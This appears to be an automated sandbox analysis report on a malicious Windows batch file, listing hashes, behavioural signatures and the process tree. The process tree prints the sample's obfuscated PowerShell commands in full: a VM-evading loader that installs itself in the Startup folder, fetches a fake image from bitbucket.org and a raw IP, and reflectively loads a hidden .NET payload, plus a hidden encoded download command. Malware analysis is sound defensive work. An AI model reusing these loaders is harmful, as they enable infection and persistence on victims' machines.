Analysis
-
max time kernel
117s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 08:38
Static task
static1
Behavioral task
behavioral1
Sample
b4ca7ff5efd0278fef09daf595489560.bat
Resource
win7-20240903-en
General
-
Target
b4ca7ff5efd0278fef09daf595489560.bat
-
Size
14KB
-
MD5
b4ca7ff5efd0278fef09daf595489560
-
SHA1
112847b2bf3d344b10aae9d6bb375de51b0d3b7b
-
SHA256
5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c
-
SHA512
5e3933d702ecad73bdd81723bd2de7bfb919a10e768a2f1a7e2c90bdb02b6f6ee30a80a9233fe7ca3bc72efb3e7b1f20ff3a6bd05960e172d77bc928418b25b2
-
SSDEEP
192:SLmONLs0foAt5SVQfFY3vJG5finGma/E0DlNwYaJQnY+1adnG7RQBaFovHSehrvb:/0foNGUvoLwzJQIdnG7R/EHZbGNpM
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1976 powershell.exe 6 1976 powershell.exe -
pid Process 2424 powershell.exe 1976 powershell.exe 2860 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b4ca7ff5efd0278fef09daf595489560.bat cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b4ca7ff5efd0278fef09daf595489560.bat cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 bitbucket.org 5 bitbucket.org 6 bitbucket.org -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2424 powershell.exe 1976 powershell.exe 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1800 WMIC.exe Token: SeSecurityPrivilege 1800 WMIC.exe Token: SeTakeOwnershipPrivilege 1800 WMIC.exe Token: SeLoadDriverPrivilege 1800 WMIC.exe Token: SeSystemProfilePrivilege 1800 WMIC.exe Token: SeSystemtimePrivilege 1800 WMIC.exe Token: SeProfSingleProcessPrivilege 1800 WMIC.exe Token: SeIncBasePriorityPrivilege 1800 WMIC.exe Token: SeCreatePagefilePrivilege 1800 WMIC.exe Token: SeBackupPrivilege 1800 WMIC.exe Token: SeRestorePrivilege 1800 WMIC.exe Token: SeShutdownPrivilege 1800 WMIC.exe Token: SeDebugPrivilege 1800 WMIC.exe Token: SeSystemEnvironmentPrivilege 1800 WMIC.exe Token: SeRemoteShutdownPrivilege 1800 WMIC.exe Token: SeUndockPrivilege 1800 WMIC.exe Token: SeManageVolumePrivilege 1800 WMIC.exe Token: 33 1800 WMIC.exe Token: 34 1800 WMIC.exe Token: 35 1800 WMIC.exe Token: SeIncreaseQuotaPrivilege 1800 WMIC.exe Token: SeSecurityPrivilege 1800 WMIC.exe Token: SeTakeOwnershipPrivilege 1800 WMIC.exe Token: SeLoadDriverPrivilege 1800 WMIC.exe Token: SeSystemProfilePrivilege 1800 WMIC.exe Token: SeSystemtimePrivilege 1800 WMIC.exe Token: SeProfSingleProcessPrivilege 1800 WMIC.exe Token: SeIncBasePriorityPrivilege 1800 WMIC.exe Token: SeCreatePagefilePrivilege 1800 WMIC.exe Token: SeBackupPrivilege 1800 WMIC.exe Token: SeRestorePrivilege 1800 WMIC.exe Token: SeShutdownPrivilege 1800 WMIC.exe Token: SeDebugPrivilege 1800 WMIC.exe Token: SeSystemEnvironmentPrivilege 1800 WMIC.exe Token: SeRemoteShutdownPrivilege 1800 WMIC.exe Token: SeUndockPrivilege 1800 WMIC.exe Token: SeManageVolumePrivilege 1800 WMIC.exe Token: 33 1800 WMIC.exe Token: 34 1800 WMIC.exe Token: 35 1800 WMIC.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2324 wrote to memory of 1800 2324 cmd.exe 32 PID 2324 wrote to memory of 1800 2324 cmd.exe 32 PID 2324 wrote to memory of 1800 2324 cmd.exe 32 PID 2324 wrote to memory of 2484 2324 cmd.exe 33 PID 2324 wrote to memory of 2484 2324 cmd.exe 33 PID 2324 wrote to memory of 2484 2324 cmd.exe 33 PID 2324 wrote to memory of 2424 2324 cmd.exe 35 PID 2324 wrote to memory of 2424 2324 cmd.exe 35 PID 2324 wrote to memory of 2424 2324 cmd.exe 35 PID 2424 wrote to memory of 1976 2424 powershell.exe 36 PID 2424 wrote to memory of 1976 2424 powershell.exe 36 PID 2424 wrote to memory of 1976 2424 powershell.exe 36 PID 2324 wrote to memory of 2860 2324 cmd.exe 37 PID 2324 wrote to memory of 2860 2324 cmd.exe 37 PID 2324 wrote to memory of 2860 2324 cmd.exe 37
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\b4ca7ff5efd0278fef09daf595489560.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\system32\find.exefind "QEMU"2⤵PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$GM$cgBj$GQ$awBl$GU$Lw$y$DY$Lg$y$D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.crcdkee/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59e373063a702bda1f03a908e2b107bd0
SHA172a172fb2b21e28486628688692fb5a9decc086b
SHA256d74634a91008e985051e2179378627ad96dfc92e79d815d07940238741d58d68
SHA512332c968b8616d9e8596eefdc5199fe595a22dbf614cecb820481923c71afa296112d3106411e1fe47ac8e3883ebef8859cd9825497e0590cb7f53e305420b86e